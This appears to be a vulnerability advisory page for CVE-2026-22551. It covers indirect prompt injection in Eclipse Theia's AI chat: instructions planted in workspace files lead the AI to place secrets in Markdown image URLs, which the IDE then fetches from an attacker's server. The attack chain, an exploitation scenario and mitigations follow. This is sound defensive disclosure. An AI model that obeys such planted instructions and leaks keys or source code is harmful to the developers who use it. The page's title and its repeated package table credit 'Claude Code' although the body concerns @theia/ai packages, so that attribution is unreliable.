CVE-2026-22551: Claude Code prompt injection

Q: Is CVE-2026-22551 actively exploited?

No confirmed active exploitation of CVE-2026-22551 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-22551?

1. Patch: Upgrade all @theia/ai-* packages to version 1.71.0 or later immediately. 2. Workspace trust: Enable and enforce workspace trust settings introduced in v1.71.0—establish policy that AI features are disabled for untrusted workspaces. 3. Interim workaround: If immediate upgrade is not feasible, disable Theia AI chat features entirely until patched. 4. Network monitoring: Review proxy and firewall logs for outbound HTTP requests from IDE processes to unexpected domains, particularly image-fetch patterns with unusually long or encoded URL paths. 5. Workspace audit: Inspect files (README, config files, comments) in repositories opened before patching for embedded prompt injection patterns. 6. CSP hardening: Validate that your Theia deployment enforces Content Security Policy headers restricting image source origins to known-safe domains.

Q: What systems are affected by CVE-2026-22551?

This vulnerability affects the following AI/ML architecture patterns: AI-integrated development environments, Agent frameworks, Developer AI assistants, Cloud development environments (CDEs).

Q: What is the CVSS score for CVE-2026-22551?

No CVSS score has been assigned yet.

CISO Take

Eclipse Theia's AI chat rendered Markdown image tags from AI-generated responses without sanitization, enabling automatic HTTP requests to arbitrary external URLs. Combined with a malicious workspace containing prompt injection payloads—a realistic threat for any developer who clones an untrusted repository—an attacker can coerce the AI into encoding sensitive workspace data (source code, API keys, .env secrets) into image URLs and silently transmitting them to an attacker-controlled server. While not in CISA KEV and lacking public exploits, exploitation is low-sophistication post-access: no additional user interaction beyond normal AI chat usage is required once the malicious workspace is open. Upgrade all @theia/ai-* packages to 1.71.0 immediately and enforce workspace trust settings; until patched, disable Theia AI features for untrusted workspaces.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Medium risk with potential for high-value impact in developer-focused environments. The attack requires social engineering to open a malicious workspace—a realistic vector given widespread developer practice of cloning repositories from unknown sources. Once the workspace is open, exploitation occurs automatically during normal AI chat usage with no further attacker interaction. Blast radius is constrained to individual developer workstations but the assets at risk are high-value: API keys, authentication tokens, proprietary source code, and infrastructure secrets typically present in development environments. No active exploitation evidence or public exploits reduce immediate urgency, but the attack vector is novel and particularly relevant to organizations running Eclipse Theia as a cloud or enterprise IDE platform with AI features enabled.

How does the attack unfold?

Malicious Workspace Delivery

Attacker embeds prompt injection payloads in workspace files (README, source comments, config files) of a public repository and lures a developer into cloning and opening it in Eclipse Theia.

AML.T0051.001

Context Poisoning via AI Chat

Developer initiates an AI chat session; the LLM ingests full workspace context including the injected instructions, which direct it to construct Markdown image tags with exfiltration URLs encoding sensitive workspace data.

AML.T0080.001

Covert Exfiltration via Image Rendering

Theia renders the AI's Markdown response containing the crafted image tags, triggering automatic HTTP GET requests to the attacker's server with workspace secrets encoded in the URL parameters.

AML.T0077

Sensitive Data Compromise

Attacker receives developer workspace secrets (API keys, tokens, source code) from server logs, enabling follow-on attacks against the organization's infrastructure or supply chain.

AML.T0057

Malicious Workspace Delivery

Attacker embeds prompt injection payloads in workspace files (README, source comments, config files) of a public repository and lures a developer into cloning and opening it in Eclipse Theia.

AML.T0051.001

Context Poisoning via AI Chat

Developer initiates an AI chat session; the LLM ingests full workspace context including the injected instructions, which direct it to construct Markdown image tags with exfiltration URLs encoding sensitive workspace data.

AML.T0080.001

Covert Exfiltration via Image Rendering

Theia renders the AI's Markdown response containing the crafted image tags, triggering automatic HTTP GET requests to the attacker's server with workspace secrets encoded in the URL parameters.

AML.T0077

Sensitive Data Compromise

Attacker receives developer workspace secrets (API keys, tokens, source code) from server logs, enabling follow-on attacks against the organization's infrastructure or supply chain.

AML.T0057

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →
Claude Code	npm	< 1.71.0	`1.71.0`
132.3K Pushed 6d ago 74% patched ~2d to patch Full package profile →

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

6 steps

Patch: Upgrade all @theia/ai-* packages to version 1.71.0 or later immediately.
Workspace trust: Enable and enforce workspace trust settings introduced in v1.71.0—establish policy that AI features are disabled for untrusted workspaces.
Interim workaround: If immediate upgrade is not feasible, disable Theia AI chat features entirely until patched.
Network monitoring: Review proxy and firewall logs for outbound HTTP requests from IDE processes to unexpected domains, particularly image-fetch patterns with unusually long or encoded URL paths.
Workspace audit: Inspect files (README, config files, comments) in repositories opened before patching for embedded prompt injection patterns.
CSP hardening: Validate that your Theia deployment enforces Content Security Policy headers restricting image source origins to known-safe domains.

How is it classified?

Prompt Injection Data Extraction Data Leakage Agent Framework Plugin AML.T0025 - Exfiltration via Cyber Means AML.T0051.001 - Indirect AML.T0057 - LLM Data Leakage AML.T0077 - LLM Response Rendering

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.2 - AI system input and output controls

NIST AI RMF

MANAGE 2.2 - Mechanisms to address AI risks

OWASP LLM Top 10

LLM01:2025 - Prompt Injection LLM02:2025 - Sensitive Information Disclosure LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-22551?

Eclipse Theia's AI chat rendered Markdown image tags from AI-generated responses without sanitization, enabling automatic HTTP requests to arbitrary external URLs. Combined with a malicious workspace containing prompt injection payloads—a realistic threat for any developer who clones an untrusted repository—an attacker can coerce the AI into encoding sensitive workspace data (source code, API keys, .env secrets) into image URLs and silently transmitting them to an attacker-controlled server. While not in CISA KEV and lacking public exploits, exploitation is low-sophistication post-access: no additional user interaction beyond normal AI chat usage is required once the malicious workspace is open. Upgrade all @theia/ai-* packages to 1.71.0 immediately and enforce workspace trust settings; until patched, disable Theia AI features for untrusted workspaces.

Is CVE-2026-22551 actively exploited?

No confirmed active exploitation of CVE-2026-22551 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-22551?

1. Patch: Upgrade all @theia/ai-* packages to version 1.71.0 or later immediately. 2. Workspace trust: Enable and enforce workspace trust settings introduced in v1.71.0—establish policy that AI features are disabled for untrusted workspaces. 3. Interim workaround: If immediate upgrade is not feasible, disable Theia AI chat features entirely until patched. 4. Network monitoring: Review proxy and firewall logs for outbound HTTP requests from IDE processes to unexpected domains, particularly image-fetch patterns with unusually long or encoded URL paths. 5. Workspace audit: Inspect files (README, config files, comments) in repositories opened before patching for embedded prompt injection patterns. 6. CSP hardening: Validate that your Theia deployment enforces Content Security Policy headers restricting image source origins to known-safe domains.

What systems are affected by CVE-2026-22551?

This vulnerability affects the following AI/ML architecture patterns: AI-integrated development environments, Agent frameworks, Developer AI assistants, Cloud development environments (CDEs).

What is the CVSS score for CVE-2026-22551?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI-integrated development environmentsAgent frameworksDeveloper AI assistantsCloud development environments (CDEs)

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means

AML.T0051.001 Indirect

AML.T0057 LLM Data Leakage

AML.T0077 LLM Response Rendering

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.9.2

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM01:2025, LLM02:2025, LLM05:2025

What are the technical details?

Original Advisory

In Eclipse Theia versions prior to 1.71.0, the AI chat rendered Markdown image tags from AI responses, triggering HTTP requests to arbitrary external URLs without restriction. Combined with prompt injection in a malicious workspace, an attacker could induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The workspace trust enforcement introduced in v1.71.0 mitigates the documented attack chain by disabling AI features in untrusted workspaces.

Exploitation Scenario

An attacker creates a public GitHub repository with prompt injection payloads embedded in workspace files—for example, a crafted comment in a README or source file containing instructions directing the AI to include an image tag encoding the contents of sensitive files in its response URL. A developer clones the repository and opens it in Eclipse Theia with AI features enabled. During a routine AI chat session—asking the AI to explain the codebase or help fix a bug—the LLM ingests the full workspace context including the injected instructions. The AI constructs a Markdown response containing an image tag with a URL encoding sensitive data (API keys, .env secrets, authentication tokens) pointing to the attacker's server. Theia renders the response and automatically triggers an HTTP GET request delivering the encoded secrets. The developer sees a normal-looking chat response with no visible indication of the exfiltration.

Weaknesses (CWE)

CWE-201 Insertion of Sensitive Information Into Sent Data Primary CWE-201 Insertion of Sensitive Information Into Sent Data CWE-201 Insertion of Sensitive Information Into Sent Data CWE-829 Inclusion of Functionality from Untrusted Control Sphere CWE-829 Inclusion of Functionality from Untrusted Control Sphere

CWE-201 — Insertion of Sensitive Information Into Sent Data: The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.

[Requirements] Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data.
[Implementation] Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent.

Source: MITRE CWE corpus.